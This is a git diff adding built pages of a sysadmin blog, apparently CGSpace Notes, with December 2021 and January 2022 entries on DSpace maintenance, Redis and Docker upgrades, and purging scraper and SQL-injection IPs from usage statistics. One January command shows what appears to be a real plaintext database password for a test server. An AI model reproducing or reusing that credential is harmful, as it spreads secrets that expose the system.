+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
+</span></span><span style="display:flex;"><span>1508
+</span></span></code></pre></div><ul>
+<li>Now looking at the locks query sorting by age of locks:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat locks-age.sql 
+</span></span><span style="display:flex;"><span>SELECT a.datname,
+</span></span><span style="display:flex;"><span>         l.relation::regclass,
+</span></span><span style="display:flex;"><span>         l.transactionid,
+</span></span><span style="display:flex;"><span>         l.mode,
+</span></span><span style="display:flex;"><span>         l.GRANTED,
+</span></span><span style="display:flex;"><span>         a.usename,
+</span></span><span style="display:flex;"><span>         a.query,
+</span></span><span style="display:flex;"><span>         a.query_start,
+</span></span><span style="display:flex;"><span>         age(now(), a.query_start) AS &#34;age&#34;,
+</span></span><span style="display:flex;"><span>         a.pid
+</span></span><span style="display:flex;"><span>FROM pg_stat_activity a
+</span></span><span style="display:flex;"><span>JOIN pg_locks l ON l.pid = a.pid
+</span></span><span style="display:flex;"><span>ORDER BY a.query_start;
+</span></span></code></pre></div><ul>
+<li>The oldest locks are 9 hours and 26 minutes old and the time on the server is <code>Tue Dec 14 18:41:58 CET 2021</code>, so it seems something happened around 9:15 this morning
+<ul>
+<li>I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)</li>
+<li>I looked at the DSpace log, but didn&rsquo;t see anything interesting there: only editors making edits&hellip;</li>
+<li>I looked at the nginx REST API logs and saw lots of GET action there from Drupal sites harvesting us&hellip;</li>
+<li>So I&rsquo;m not sure what it causing this&hellip; perhaps something in the XMLUI submission / task workflow</li>
+<li>For now I just ran all system updates and rebooted the server</li>
+<li>I also enabled Atmire&rsquo;s <code>log-db-activity.sh</code> script to run every four hours (in the DSpace user&rsquo;s crontab) so perhaps that will be better than me checking manually</li>
+</ul>
+</li>
+<li>Regarding Gaia&rsquo;s 1,000 items to upload to CGSpace, I checked the eighteen Green Cover records and there are no duplicates, so that&rsquo;s at least a starting point!
+<ul>
+<li>I sent her a spreadsheet with the eighteen items with a new collection column to indicate where they should go</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-16">2021-12-16</h2>
+<ul>
+<li>Working on the CGIAR CAS Green Cover records for Gaia
+<ul>
+<li>Add months to dcterms.issued from PDFs</li>
+<li>Add languages</li>
+<li>Format and fix several authors</li>
+</ul>
+</li>
+<li>I created a SAF archive with SAFBuilder and then imported it to DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2021-12-16-green-covers.map
+</span></span></code></pre></div><h2 id="2021-12-19">2021-12-19</h2>
+<ul>
+<li>I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
+</span></span><span style="display:flex;"><span>&gt; nest build
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
+</span></span><span style="display:flex;"><span>                 ~~~~~~~~~~~~~~~~~~~~~
+</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
+</span></span><span style="display:flex;"><span>                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m not sure why because I build the backend successfully on my local machine&hellip;
+<ul>
+<li>For now I just ran all the system updates and rebooted the machine (linode20)</li>
+<li>Then I started a fresh harvest</li>
+</ul>
+</li>
+<li>Now I cleared all images on my local machine and I get the same error when building the backend
+<ul>
+<li>It seems to be related to <code>@elastic/elasticsearch-js</code>](<a href="https://github.com/elastic/elasticsearch-js)">https://github.com/elastic/elasticsearch-js)</a>, which our <code>package.json</code> pins with version <code>^7.13.0</code></li>
+<li>I see that AReS is currently using 7.15.0 in its <code>package-lock.json</code>, and 7.16.0 was released four days ago so perhaps it&rsquo;s that&hellip;</li>
+<li>Pinning <code>~7.15.0</code> allows nest to build fine&hellip;</li>
+<li>I made a pull request</li>
+</ul>
+</li>
+<li>But since software sucks, now I get an error in the frontend while starting nginx:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>nginx: [emerg] host not found in upstream &#34;backend:3000&#34; in /etc/nginx/conf.d/default.conf:2
+</span></span></code></pre></div><ul>
+<li>In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I&rsquo;m happy to see that the <a href="https://raw.githubusercontent.com/redis/redis/6.0/00-RELEASENOTES">release notes for version 6</a> say that it is compatible with 5 except for one minor thing that we don&rsquo;t seem to be using (SPOP?)</li>
+<li>For reference I see that our Redis 5 container is based on Debian 11, which I didn&rsquo;t expect&hellip; but I still want to try to upgrade to Redis 6 eventually:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec -it redis bash
+</span></span><span style="display:flex;"><span>root@23692d6b51c5:/data# cat /etc/os-release 
+</span></span><span style="display:flex;"><span>PRETTY_NAME=&#34;Debian GNU/Linux 11 (bullseye)&#34;
+</span></span><span style="display:flex;"><span>NAME=&#34;Debian GNU/Linux&#34;
+</span></span><span style="display:flex;"><span>VERSION_ID=&#34;11&#34;
+</span></span><span style="display:flex;"><span>VERSION=&#34;11 (bullseye)&#34;
+</span></span><span style="display:flex;"><span>VERSION_CODENAME=bullseye
+</span></span><span style="display:flex;"><span>ID=debian
+</span></span><span style="display:flex;"><span>HOME_URL=&#34;https://www.debian.org/&#34;
+</span></span><span style="display:flex;"><span>SUPPORT_URL=&#34;https://www.debian.org/support&#34;
+</span></span><span style="display:flex;"><span>BUG_REPORT_URL=&#34;https://bugs.debian.org/&#34;
+</span></span></code></pre></div><ul>
+<li>I bumped the version to 6 on my local test machine and the logs look good:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs redis
+</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
+</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
+</span></span><span style="display:flex;"><span>1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.584 # Server initialized
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
+</span></span><span style="display:flex;"><span>1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
+</span></span></code></pre></div><ul>
+<li>The interface and harvesting all work as expected&hellip;
+<ul>
+<li>I pushed the update to OpenRXV</li>
+</ul>
+</li>
+<li>I also fixed the weird &ldquo;unsafe&rdquo; issue in the links on AReS that Abenet told me about last week
+<ul>
+<li>When testing my local instance I realized that the <code>thumbnail</code> field was missing on the production AReS, and that somehow breaks the links</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-12-22">2021-12-22</h2>
+<ul>
+<li>Fix apt error on DSpace servers due to updated <code>/etc/java-8-openjdk/security/java.security</code> file</li>
+</ul>
+<h2 id="2021-12-23">2021-12-23</h2>
+<ul>
+<li>Add support for dropping invalid AGROVOC subjects to csv-metadata-quality</li>
+<li>Move invalid AGROVOC subjects in Gaia&rsquo;s eighteen green cover items on DSpace Test to <code>cg.subject.system</code></li>
+<li>I created an &ldquo;approve&rdquo; user for Rafael from CIAT to do tests on DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuuuu&#39;</span>
+</span></span></code></pre></div><h2 id="2021-12-27">2021-12-27</h2>
+<ul>
+<li>Start a fresh harvest on AReS</li>
+</ul>
+<h2 id="2021-12-29">2021-12-29</h2>
+<ul>
+<li>Looking at the top IPs and user agents on CGSpace&rsquo;s Solr statistics I see a strange user agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.{random.randint(0, 9999)} Safari/537.{random.randint(0, 99)}
+</span></span></code></pre></div><ul>
+<li>I found two IPs using user agents with the &ldquo;randint&rdquo; bug:
+<ul>
+<li>47.252.80.214 (AliCloud in the US)</li>
+<li>61.143.40.50 (ChinaNet in China)</li>
+</ul>
+</li>
+<li>I wonder what other requests have been made from those hosts where the randint spoofer was working&hellip; ugh.</li>
+<li>I found some IPs from the Russian SELECTEL network making thousands of requests with SQL injection attempts&hellip;
+<ul>
+<li>45.134.26.171</li>
+<li>45.146.166.173</li>
+</ul>
+</li>
+<li>3.225.28.105 is on Amazon and making thousands of requests for the same URL:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>/rest/collections/1118/items?expand=all&amp;limit=1
+</span></span></code></pre></div><ul>
+<li>Most of the time it has a real-looking user agent, but sometimes it uses <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
+<li>Another 82.65.26.228 is doing SQL injection attempts from France</li>
+<li>216.213.28.138 is some scrape-as-a-service bot from Sprious</li>
+<li>I used my <code>resolve-addresses-geoip2.py</code> script to get the ASNs for all the IPs in Solr stats this month, then extracted the ASNs that were responsible for more than one IP:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-12-29-ips.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c asn /tmp/2021-12-29-ips.csv | sed 1d | sort | uniq -c | sort -h | awk <span style="color:#e6db74">&#39;$1 &gt; 1&#39;</span>
+</span></span><span style="display:flex;"><span>      2 10620
+</span></span><span style="display:flex;"><span>      2 265696
+</span></span><span style="display:flex;"><span>      2 6147
+</span></span><span style="display:flex;"><span>      2 9299
+</span></span><span style="display:flex;"><span>      3 3269
+</span></span><span style="display:flex;"><span>      5 16509
+</span></span><span style="display:flex;"><span>      5 49505
+</span></span><span style="display:flex;"><span>      9 24757
+</span></span><span style="display:flex;"><span>      9 24940
+</span></span><span style="display:flex;"><span>      9 64267
+</span></span></code></pre></div><ul>
+<li>AS 64267 is Sprious, and it has used these IPs this month:
+<ul>
+<li>216.213.28.136</li>
+<li>207.182.27.191</li>
+<li>216.41.235.187</li>
+<li>216.41.232.169</li>
+<li>216.41.235.186</li>
+<li>52.124.19.190</li>
+<li>216.213.28.138</li>
+<li>216.41.234.163</li>
+</ul>
+</li>
+<li>To be honest I want to ban all their networks but I&rsquo;m afraid it&rsquo;s too many IPs&hellip; hmmm</li>
+<li>AS 24940 is Hetzner, but I don&rsquo;t feel like going through all the IPs to see&hellip; they always pretend to be normal users and make semi-sane requests so it might be a proxy or something</li>
+<li>AS 24757 is Ethiopian Telecom</li>
+<li>I&rsquo;m going to purge all these for sure, as they are a scraping-as-a-service company and don&rsquo;t use proper user agents or request robots.txt</li>
+<li>AS 49505 is the Russian Selectel, and it has used these IPs this month:
+<ul>
+<li>45.146.166.173</li>
+<li>45.134.26.171</li>
+<li>45.146.164.123</li>
+<li>45.155.205.231</li>
+<li>195.54.167.122</li>
+</ul>
+</li>
+<li>I will purge them all too because they are up to no good, as I already saw earlier today (SQL injections)</li>
+<li>AS 16509 is Amazon, and it has used these IPs this month:
+<ul>
+<li>18.135.23.223 (made requests using the <code>Mozilla/5.0 (compatible; U; Koha checkurl)</code> user agent, so I will purge it and add it to our DSpace user agent override and <a href="https://github.com/atmire/COUNTER-Robots/pull/51">submit to COUNTER-Robots</a>)</li>
+<li>54.76.137.83 (made hundreds of requests to &ldquo;/&rdquo; with a normal user agent)</li>
+<li>34.253.119.85 (made hundreds of requests to &ldquo;/&rdquo; with a normal user agent)</li>
+<li>34.216.201.131 (made hundreds of requests to &ldquo;/&rdquo; with a normal user agent)</li>
+<li>54.203.193.46 (made hundreds of requests to &ldquo;/&rdquo; with a normal user agent)</li>
+</ul>
+</li>
+<li>I ran the script to purge spider agents with the latest updates:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+</span></span><span style="display:flex;"><span>Purging 2530 hits from HeadlessChrome in statistics
+</span></span><span style="display:flex;"><span>Purging 10676 hits from randint in statistics
+</span></span><span style="display:flex;"><span>Purging 3579 hits from Koha in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 16785
+</span></span></code></pre></div><ul>
+<li>Then the IPs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
+</span></span><span style="display:flex;"><span>Purging 1190 hits from 216.213.28.136 in statistics
+</span></span><span style="display:flex;"><span>Purging 1128 hits from 207.182.27.191 in statistics
+</span></span><span style="display:flex;"><span>Purging 1095 hits from 216.41.235.187 in statistics
+</span></span><span style="display:flex;"><span>Purging 1087 hits from 216.41.232.169 in statistics
+</span></span><span style="display:flex;"><span>Purging 1011 hits from 216.41.235.186 in statistics
+</span></span><span style="display:flex;"><span>Purging 945 hits from 52.124.19.190 in statistics
+</span></span><span style="display:flex;"><span>Purging 933 hits from 216.213.28.138 in statistics
+</span></span><span style="display:flex;"><span>Purging 930 hits from 216.41.234.163 in statistics
+</span></span><span style="display:flex;"><span>Purging 4410 hits from 45.146.166.173 in statistics
+</span></span><span style="display:flex;"><span>Purging 2688 hits from 45.134.26.171 in statistics
+</span></span><span style="display:flex;"><span>Purging 1130 hits from 45.146.164.123 in statistics
+</span></span><span style="display:flex;"><span>Purging 536 hits from 45.155.205.231 in statistics
+</span></span><span style="display:flex;"><span>Purging 10676 hits from 195.54.167.122 in statistics
+</span></span><span style="display:flex;"><span>Purging 1350 hits from 54.76.137.83 in statistics
+</span></span><span style="display:flex;"><span>Purging 1240 hits from 34.253.119.85 in statistics
+</span></span><span style="display:flex;"><span>Purging 2879 hits from 34.216.201.131 in statistics
+</span></span><span style="display:flex;"><span>Purging 2909 hits from 54.203.193.46 in statistics
+</span></span><span style="display:flex;"><span>Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 37959
+</span></span></code></pre></div><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021/03/postgres_connections_ALL-week.png b/docs/2021/03/postgres_connections_ALL-week.png
new file mode 100644
index 000000000..3b9aa9ee9
Binary files /dev/null and b/docs/2021/03/postgres_connections_ALL-week.png differ
diff --git a/docs/2021/03/postgres_connections_cgspace-week.png b/docs/2021/03/postgres_connections_cgspace-week.png
new file mode 100644
index 000000000..0a911b038
Binary files /dev/null and b/docs/2021/03/postgres_connections_cgspace-week.png differ
diff --git a/docs/2021/03/postgres_locks_ALL-week.png b/docs/2021/03/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..aa44644c4
Binary files /dev/null and b/docs/2021/03/postgres_locks_ALL-week.png differ
diff --git a/docs/2021/03/postgres_querylength_ALL-week.png b/docs/2021/03/postgres_querylength_ALL-week.png
new file mode 100644
index 000000000..5072ac336
Binary files /dev/null and b/docs/2021/03/postgres_querylength_ALL-week.png differ
diff --git a/docs/2021/04/classes_unloaded-week.png b/docs/2021/04/classes_unloaded-week.png
new file mode 100644
index 000000000..4c915179d
Binary files /dev/null and b/docs/2021/04/classes_unloaded-week.png differ
diff --git a/docs/2021/04/group-invalid-email.png b/docs/2021/04/group-invalid-email.png
new file mode 100644
index 000000000..dc2fb8922
Binary files /dev/null and b/docs/2021/04/group-invalid-email.png differ
diff --git a/docs/2021/04/jmx_dspace_sessions-week.png b/docs/2021/04/jmx_dspace_sessions-week.png
new file mode 100644
index 000000000..af73363b0
Binary files /dev/null and b/docs/2021/04/jmx_dspace_sessions-week.png differ
diff --git a/docs/2021/04/jmx_tomcat_dbpools-week.png b/docs/2021/04/jmx_tomcat_dbpools-week.png
new file mode 100644
index 000000000..55765a3a0
Binary files /dev/null and b/docs/2021/04/jmx_tomcat_dbpools-week.png differ
diff --git a/docs/2021/04/nginx_status-week.png b/docs/2021/04/nginx_status-week.png
new file mode 100644
index 000000000..01f988e9e
Binary files /dev/null and b/docs/2021/04/nginx_status-week.png differ
diff --git a/docs/2021/04/postgres_connections_cgspace-week.png b/docs/2021/04/postgres_connections_cgspace-week.png
new file mode 100644
index 000000000..8bfabf413
Binary files /dev/null and b/docs/2021/04/postgres_connections_cgspace-week.png differ
diff --git a/docs/2021/04/postgres_locks_ALL-week-PROD.png b/docs/2021/04/postgres_locks_ALL-week-PROD.png
new file mode 100644
index 000000000..cc0c1863b
Binary files /dev/null and b/docs/2021/04/postgres_locks_ALL-week-PROD.png differ
diff --git a/docs/2021/04/postgres_locks_ALL-week-TEST.png b/docs/2021/04/postgres_locks_ALL-week-TEST.png
new file mode 100644
index 000000000..4efd396bd
Binary files /dev/null and b/docs/2021/04/postgres_locks_ALL-week-TEST.png differ
diff --git a/docs/2021/04/postgres_locks_cgspace-week.png b/docs/2021/04/postgres_locks_cgspace-week.png
new file mode 100644
index 000000000..5e22431b9
Binary files /dev/null and b/docs/2021/04/postgres_locks_cgspace-week.png differ
diff --git a/docs/2021/04/sda-week.png b/docs/2021/04/sda-week.png
new file mode 100644
index 000000000..ddc5a7b50
Binary files /dev/null and b/docs/2021/04/sda-week.png differ
diff --git a/docs/2021/06/dspace-sessions-week.png b/docs/2021/06/dspace-sessions-week.png
new file mode 100644
index 000000000..a89408ebf
Binary files /dev/null and b/docs/2021/06/dspace-sessions-week.png differ
diff --git a/docs/2021/07/context-navigation-menu.png b/docs/2021/07/context-navigation-menu.png
new file mode 100644
index 000000000..8450f0f89
Binary files /dev/null and b/docs/2021/07/context-navigation-menu.png differ
diff --git a/docs/2021/09/postgres_locks_ALL-week.png b/docs/2021/09/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..fa8296913
Binary files /dev/null and b/docs/2021/09/postgres_locks_ALL-week.png differ
diff --git a/docs/2021/09/postgres_querylength_ALL-week.png b/docs/2021/09/postgres_querylength_ALL-week.png
new file mode 100644
index 000000000..87f63fb4d
Binary files /dev/null and b/docs/2021/09/postgres_querylength_ALL-week.png differ
diff --git a/docs/2021/10/postgres_locks_ALL-week.png b/docs/2021/10/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..6e5b981a1
Binary files /dev/null and b/docs/2021/10/postgres_locks_ALL-week.png differ
diff --git a/docs/2021/11/postgres_locks_ALL-week.png b/docs/2021/11/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..f13302de7
Binary files /dev/null and b/docs/2021/11/postgres_locks_ALL-week.png differ
diff --git a/docs/2021/12/postgres_locks_ALL-week.png b/docs/2021/12/postgres_locks_ALL-week.png
new file mode 100644
index 000000000..2033f41fc
Binary files /dev/null and b/docs/2021/12/postgres_locks_ALL-week.png differ
diff --git a/docs/2022-01/index.html b/docs/2022-01/index.html
new file mode 100644
index 000000000..5092127e7
--- /dev/null
+++ b/docs/2022-01/index.html
@@ -0,0 +1,434 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2022" />
+<meta property="og:description" content="2022-01-01
+
+Start a full harvest on AReS
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-01/" />
+<meta property="article:published_time" content="2022-01-01T15:20:54+02:00" />
+<meta property="article:modified_time" content="2022-05-12T12:51:45+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2022"/>
+<meta name="twitter:description" content="2022-01-01
+
+Start a full harvest on AReS
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-01/",
+  "wordCount": "1224",
+  "datePublished": "2022-01-01T15:20:54+02:00",
+  "dateModified": "2022-05-12T12:51:45+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-01/">
+
+    <title>January, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-01/">January, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-01-01T15:20:54+02:00">Sat Jan 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-01-01">2022-01-01</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-01-06">2022-01-06</h2>
+<ul>
+<li>Add ORCID identifier for Chris Jones to CGSpace
+<ul>
+<li>Also tag eighty-eight of his items in CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-01-06-add-orcids.csv
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Jones, Chris&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
+</span></span><span style="display:flex;"><span>&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span>
+</span></span></code></pre></div><h2 id="2022-01-09">2022-01-09</h2>
+<ul>
+<li>Validate and register CGSpace on <a href="https://www.openarchives.org/Register/ValidateSite?log=Z2V7WCT7">OpenArchives</a>
+<ul>
+<li>Last month IWMI colleagues were asking me to look into this, and after checking the OpenArchives mailing list it seems there was a problem on the server side</li>
